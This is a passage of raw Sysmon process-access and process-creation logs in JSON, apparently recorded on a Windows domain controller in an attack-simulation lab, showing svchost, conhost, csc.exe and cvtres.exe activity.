07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.079\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.079","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010FA820600}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.332\r\nProcessGuid: {41C8662E-20BC-5F25-0000-0010CE860600}\r\nProcessId: 4276\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES62C8.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCA9B9A4638634687A14C968597358.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nParentProcessId: 4124\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wbimrl4c.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.332","ProcessGuid":"{41C8662E-20BC-5F25-0000-0010CE860600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES62C8.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCA9B9A4638634687A14C968597358.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20BC-5F25-0000-0010FA820600}","ParentProcessId":"4124","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wbimrl4c.cmdline\"","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nSourceProcessId: 4124\r\nSourceThreadId: 2704\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010CE860600}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 